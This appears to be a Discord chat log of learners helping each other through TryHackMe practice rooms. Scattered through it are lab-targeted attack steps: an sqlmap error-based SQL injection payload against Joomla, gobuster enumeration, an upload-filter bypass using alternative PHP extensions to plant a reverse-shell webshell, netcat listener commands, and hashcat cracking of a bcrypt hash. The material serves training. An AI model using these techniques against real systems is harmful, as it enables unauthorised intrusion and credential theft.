on the scripting task 2, when i connect to the host and send anything it just errors out, am i supposed to send something specific to the port so it will tell me the next instruction?

ok i think i get it nm

@visual jolt thanks for the tip!

CC:pen test stuck on "what is the name of the
Hidden file with extension xxa"

hey guys, merry christmas first of all

I am stuck on on task 11 of linux fundementals 2, my 3rd language is english, and I don't really understand what is asked me to do in this task "the challenge is pretty simple, the binary is checking to see if the environment variable test1234 exists, and if it's set to equal to the current $USER environment variable."

I am using export test1234=$USER, and I execute but I get a permission denied

what am I doing wrong here?

You are logged in as shiba2 right?

yeah

and I don't have permission

Can you send a screenshot?

i don't have discord on my kali machine

I can send you a photo

Ok, better than nothing

oh rly

What is shiba3's password?

yes this question

you have shiba2 or shiba3 in your directory?

ah my machine is expiring in 30 seconds, I'd appreciate the help and I'll try it next time

is it cheating that I am still ssh into it?

You can always add +1 hour

no I am not subbed, I wish I could

You mean you are using THM's attack box?

yeah the room machine

the one that I press "Deploy"

but instead I ssh into it, because the browser machine on my internet sucks

Ok so you have your own Kali. Then you don't need to be subscribed to add +1 hour to the room machine.

what so you mean, I can stay ssh?

Yes, but you need to press Add 1 hour button before the timer runs out.

yeah Now I understand

I just got disconnected

You can redeploy the machine.

but I can still answer the questions and learn using my kali machine

I completed the whole room, but im still stuck in that shiba3 password thingy

im sorry if i am a annoying but ive been trying for 3 days, I lost 3 hours of machine time trying to figure this question out

Your Executable does not have permission to execute.

yeah and I can't sudo

so I need to be in a higher priviledged user

||chmod||?

or something like that

exactly but in this i am not supposed to know what chmod is

yet

but anyways thanks, ill figure it out tomorrow

Any hints for me pls?

Hello, i have a problem:
Room: https://tryhackme.com/room/furthernmap
Task 14

Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?

sudo nmap -sX -p0-999 10.10.171.203
gives me:
22/tcp open|filtered ssh
80/tcp open|filtered http
111/tcp open|filtered rpcbind

Answer format: ***

but answer should be: 3 or three, but its wrong. What i doing wrong?

003

maybe?

haha, thats not corrct

ahhaha i am dumb

What happens to other ports?

other ports -sX timed out but not "no response", wired

Try redeploying the machine.

maybe i scan the wrong "machine_ip"
Perform a TCP SYN scan on the first 5000 ports of the target -- how many ports are shown to be open?
its 4, but the answer is incorrect
scanned with:
sudo nmap -sS -p0-5000 10.10.171.203

Uh-oh! You are not a subscribed user and cannot deploy this machine. To subscribe visit your profile.
Oh my g0d...
i still conected via vpn, which ip to scan?, where i can find, which ip i have to scan for task 14?

You need to press the green Deploy button.

oh, i tried starting attack box, this is not the same as deploy, lessons learned.
deploy machines within task 1, ok!

ok, my fault was, instead of deploying machine in task 1, i did use the attack box as scan target. thank u for ur hints!

Hey guys I'm stuck...roomname cc pen testing task 4 last question what is the name of the hidden file with the extension xxa ?

I can't curl any of the .txt I found on the server. Says I don't have permission..?

did you run gobuster with -x .xxa?

No¿ Of course I fallowed the write-up but in it says to look for a .txt? At least I swore those were the instructions

Ok well thanks I'll try that

Matter fact I'll write up says a certain file should appear and it doesn't even show up on mines so that's off...?

The*

Nope unsuccessful...that .xxa file found don't help

it could be that it was an old writeup and the room changed since it was created. what do you mean by didnt help?

Well I tried accessing the phone
.xxa files can't access anything from then

are we looking at the same question? Task 4?

What is the name of the hidden file with the extension xxa

Sorry yes xxa

The file is located on the un a home for of a user

In the write-up I'm supposed to look for .txt via gobuster more specifically file called secret.txt but unable to locate?

Wait I found something...

Got it they changed it alright

Ty

@white salmon tldr the writeup he's following (think the one attached to the room?) shows a secret.txt.. but looks like thats not there anymore?

uh

Yup

Exactly

i didnt touch the box

if the writeup is wrong then i guess ill just remove it

Well it not how the write up described

At the last parts don't match the writeup

But thanks

hint for dogcat?

me and @white salmon are stuck

Hint for nmap scan for flag -p-400 please

nvm figured it out

I was just being dumb

It says If you are using Kali Linux you can find many wordlists under /usr/share/wordlists. But I am using Manjaro so how do I find the wordlists?

https://github.com/danielmiessler/SecLists

right here

you can git clone the whole repo or you can just download the ones you want

@keen flax

I am actually doing the Vulnversity

so will that work?

@keen flax You want this...

https://github.com/daviddias/node-dirbuster/tree/master/lists

ok

SecLists is a great bunch of wordlists, but for what youre doing (leep it simple..) when you clone the repo itll have an ok wordlist for vulneversity, I would clone SecLists as well, you will use it

do I clone the whole SecLists reop?

yes.

well, i mean you can, or you can just grab the ones you want..

ok

Sorry @night fractal didnt mean to step on your toes.

they want you to use wordlists for gobuster so you could just get https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-medium.txt for a more thorough search, and https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt for a faster search of the most common directories

all good man, I just wanted him to do a bit of research and find out the ones he need by himself, while also providing him with stuff he may need later

Yeah, I sensed that after I jumped all in it...its Christmas, my son wouldnt let me sleep, so I wasnt thinking lol

IM like "nope, not today"

dang

good for me I'm ugly af so no kids will bother me

lololol awww

im ugly asf and my kids still bother me...

my mans got lucky

so i dont think that has anything to do with it lol

good for you

nah, i got 5...luck was not with me

it just means I ain't gonna get a gf

Bruv...theres someone for everyone....sometimes it just takes time...

wow, I didn't see that coming, that must be tough on you and your wife

welllll I mean sometimes....but most days its nothing...I just get spread thin...cause each one has a different personality and needs different things at any given moment...ive been up since 4 screwing around enjoying my quiet time. lol

yeah, takes a lot of patience and hard work, I'm glad that you can keep it up

Room:
https://tryhackme.com/room/dailybugle

I figured out Joomla Version, found SQLi, dumped passwords with sqlmap, get a user named root with hash, but no success in cracking it with simple rockyou + best64.rules

Am I right, i should not crack this root mysql password?
Am I right, i should look for joomla users in Database via SQLi to obtain another users hash?

Someone is doing this box right now?

The box went off, after 1h + 1h extended, so i deployed again, but sqlmap need figuring out again the injection points.

||Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9809 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(9809=9809,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)||

How i can faster resume sqlmap while IP/domain is changing?
Thank u for some hints and telling me if iam on the right way to own the box.

@night fractal I used this https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt and ran that cmd but idk how to find what they are asking

gobuster dir -u http://<ip>:3333 -w <word list location> This cmd

*Instead of using SQLMap, why not use a python script!* You can get exploits for Joomla. The hash is bcrypt and is a slow encryption method. It will take time to Decrypt the hash, you can reduce your Wordlist to reduce the time.

can you post the output of the gobuster command that you ran?

It was doing this
Progress : num/4662

did you get something similar to this

yes

so you hit some directories like /uploads or /admin ?

[+] Wordlist: /usr/share/wordlists/common

k, that's good

I'm interested in the output of the search tho

kinda like on that screenshot you can see it hit /index /index.php and lots of others

did you get any hits?

/.hta                 (Status: 403) [Size: 293]
/.htaccess            (Status: 403) [Size: 298]
/.htpasswd            (Status: 403) [Size: 298]
/css                  (Status: 301) [Size: 317] [--> http://10.10.163.86:3333/css/]
Progress: 1313 / 4662 (28.16%)                                              Progress: 1324 / 4662 (28.40%)               
```Do you mean this?

yeah

those are all directories that exist on the box

let it run through the whole wordlist and see if there's anything interesting

I think I will run the command again cuz I think it was messed up

it should be just gobuster dir -u http://BOXIP -w /full/path/to/wordlist

um I think I found it

||/internal/||

bingo

thx for the help

you're welcome 😄

btw I am stuck here Compromise the webserver lol

where exactly are you stuck

idk where to start

Try upload a few file types to the server, what common extension seems to be blocked?

it says this

yeah

but it never told how to upload

jonhas hash is bcrypt $2*$, Blowfish (Unix), right
but the root hash dumped with "sqlmap --passwords" seems be MYSQL hash
no problem, i got jonahs password with hashcat -m3200 rockyou.txt
thank u!

the previous question was to find a directory where you can upload stuff so...

let me see

I will just have to learn Burp Suite then I think I am good to go

tbh you don't even need burp for this room

but learning Burp can be helpful

it's just a bit messed bc the interface changed since lot of the tutorials were made

I mean it says there

To identify which extensions are not blocked, we're going to fuzz the upload form.

To do this, we're doing to use BurpSuite. 

yeah

but then they're gonna upload 5 files

which you could've done on your own

my suggestion is to leave Burp for later, like after finishing this room, bc it can be useful, but then again it is your choice and I'm not making you do anything against your will

I don't exactly know how you would do this

pretty sure if you open http://BOXIP/internal you'll get a website

nope

even with the port 3333?

'cause I'm pretty sure there should be a page where you can upload files bc if you're gonna use burp you'll first want to capture some traffic, which will be generated from your browser by visiting a page and interacting with it

yup

Secure Connection Failed

are you by any chance trying to visit it via https and not http?

wait now it worked

weird

without http it worked lmao how

This right?

idk to be fair, I'm pretty sure visiting it without http and putting http in front doesn't change anything

putting https does change some things tho

exactly

ok

now you can either set up a proxy and capture some traffic with burp, and then automate uploading files with different extensions

oof let me add .txt in front of my file xD

or you can just make some files of your own and do it manually

ok

without messing with proxy server and burp

ummm

I try to upload common.txt it says extension not allowed

for whatever reason they just don't allow uploading .txt files

you can try some other extensions like .png .jpg and what you're mostly interested in .php and similar extensions that allow you to embed php code in them

ok

Can the .php file be empty?

yeah

you're just fuzzing for what file extensions are allowed

weird

.php also says Extension not allowed

yeah

which makes sense

if someone uploads a .php file they could get code execution by navigating to the ||uploads folder|| that you also hopefully found with gobuster

.php are blocked right

yup

you may wanna search online for what php extensions exist, since .php isn't the only one

I know some

can you successfully upload any of them?

yes

that's great

now you can keep following the room instructions

Whenever I visit : http://<ip>:3333/internal/uploads/php-reverse-shell.phtml
I get : WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)

first of all, did you change the IP and port in the revshell?

yes

good

did you start a listener on your machine?

nc -lvnp 3333 yep

but idk if this is right

yeah, that's gonna start a listener on port 3333

and I guess you set the port to 3333 in the revshell

?

yes

might be your firewall then

hmm let me disable it

it was firewall

makes sense

@keen flax If you are experiencing an issue with the reverse shell on AoC2 Day 2 with a failed to daemonize, connection refused (111) error, run through these steps to see if it resolves:

1. Is your listener running as root? ports below 1024 require root privileges to open you need to either have a root account or use sudo an example of this would be sudo nc -lvnp 443.
2. Your port number in the reverse shell script must be same as in your listener.
3. Your IP in the reverse shell script should not be 10.10.x.x that is your room IP, you need to use your eth0 / tun0 IP depending on if youre using the in-browser machines or openvpn.

I wrote that for AOC day 2 but it’s still relevant for what you’re doing

If you get a connection timed out it’s almost always because your listener is improperly setup or your script is improperly setup

I am doing Vulnversity

they said the problem was in the firewall tho

.

so I'm assuming they got it working fine

yes

@solemn smelt

So this is what it asks What is the name of the user who manages the webserver? but the thing I got in terminal doesn't tell that

which user are you right now

?

in linux

how do you know which user are you logged in as?

whoami?

yup

yea I tried that

but it is incorrect

It's not what user is it running as

It's who manages it

true

I just forgot how I got the answer so I thought maybe it logs you in as that user

so you can see are there any users in /home

OwO

bruh

how are you supposed to know that

most of your users that are used by people and not services have their own home directory

it's common linux knowledge

Hello guys, i'm doing Bookstore room and have a question about privesc to root. I saw binary file try-harder, and i saw that it needs to be reversed somehow. Any advice for reverse tool aside from ghidra?

there's IDA, but I don't know how useful the free version is

you can use radare but it's kinda messed up unless you're used to it

Yeah, i used IDA free on linux but it cannot be converted to pseudo code C-like code unlike the pro version

Nvm, i just try ghidra and it is not as hard as i thought

Room:
https://tryhackme.com/room/dailybugle

Im trying msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) on this Joomla ||3.7.0||
but msf check fails, exploit fails with "Error retrieving table prefix"
i looked here, but cant read ruby: https://www.exploit-db.com/exploits/44358
wireshark show me error 500 while trying check or exploit

How to get this RCE working or is it because of the wired table prefixes I discovered with sqlmap? Should I stop trying use MSF RCE, should I focus on webshell and privesc? Thank u

what i got till now is joomla version, mysql root hash, joomla superuser username and hash and password, but still no root (ssh) :-)

Any suggestion for me please?

@white salmon the RCE isn't the intended route so I'd skip over it.

If you've got a shell, focus on escalation

Sec list already comes with kali

On linux strength training, Task 9, I was trying to create a hash file of sql backups, but it's keep showing this. Any hints?

I am stuck on this task too!

hello guys , on linux strength training , task 9 im stuck on sql back-up password , any hint ?

does anyone know the answer to the question "What i sthe value of the web.txt flag?" of the last day? i am stuck and run out of time, and even if you know about the user.txt flag and robot.txt flag last day

i am talking about the adventofcyber2 room

oh! turns out that everybody is stuck on this task

no i still cant find the password of the buck-up databse that starts with ebq

#778305825797177374

Hey there, stuck with linux fundamentals 2 task 11. guess you need to execute ./shiba2 to get shiba3's passwd, but this only generates a segmentation fault (core dumped). Any hints appreciated!